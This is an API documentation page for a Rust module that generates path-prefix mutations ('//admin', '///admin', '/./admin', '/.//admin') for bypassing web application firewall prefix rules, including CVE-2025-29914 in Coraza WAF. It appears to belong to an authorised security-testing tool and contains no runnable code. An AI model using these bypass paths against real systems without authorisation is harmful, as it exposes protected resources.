Skip to main content

Module path_prefix

Module path_prefix 

Source
Expand description

Path-prefix mutations — restructure the URI path so the WAF’s prefix-match ACL sees a different shape than the origin parser eventually serves.

§Why this is a distinct module from crate::url_mutate

url_mutate operates on path SEGMENT bytes and on QUERY VALUE bytes. The mutations here operate on path STRUCTURE — they change how the path is delimited, not what’s inside it. Lumping them into UrlStrategy would force a value-byte mutator and a path-shape mutator into one enum and produce category errors at the call sites that build attack pipelines.

§What’s here

§PathPrefixStrategy::DoubleSlash — CVE-2025-29914 (Coraza WAF < 3.3.3)

Coraza historically used Go’s net/url::Parse() which treats URIs starting with // as protocol-relative — //admin is parsed as Host = "admin", Path = "". A Coraza ACL of the form SecRule REQUEST_URI "@beginsWith /admin" does not fire because REQUEST_URI was populated from the parsed Path field, which is empty. The HTTP origin behind Coraza (nginx, Caddy, Envoy) re-parses the raw request line, normalises //admin back to /admin, and serves the protected resource. Confirmed CVSS 5.4; fixed in Coraza 3.3.3. Every unpatched Coraza deployment with any prefix-match ACL is bypassed by a one-character path edit.

Citation: https://dev.to/cverports/cve-2025-29914-the-double-slash-deception-bypassing-coraza-waf-with-rfc-compliance-2l75

§PathPrefixStrategy::TripleSlash

Stretches DoubleSlash further — some normalisers collapse //// only after the first decode, so an origin that decodes once and a WAF that decodes zero times see different forms. Useful when a WAF normalises // but not ///.

§PathPrefixStrategy::SlashDot / SlashDotSlash

/./admin and /.//admin. RFC 3986 §5.2.4 says these resolve to /admin after segment normalisation. WAFs that match the raw REQUEST_URI literal miss them; origins that apply RFC normalisation (Apache, IIS, most reverse proxies) serve the protected path.

§Reachability

Exposed through mutate_url_with_prefix(). The strategy engine drives this via a new Technique::PathPrefix(...) arm; the parser-diff path family probes each variant in turn against the authorised target.

Pass 21 R62 — frontier technique #4 per the 2025 research scan.

Enums§

PathPrefixStrategy

Functions§

mutate_path_prefix
Apply a path-prefix mutation to a path-and-query string. Returns the mutated form and the technique label.